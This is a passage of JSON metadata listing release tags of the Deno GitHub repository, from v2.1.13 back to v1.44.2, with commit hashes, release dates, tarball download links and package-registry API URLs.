":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url"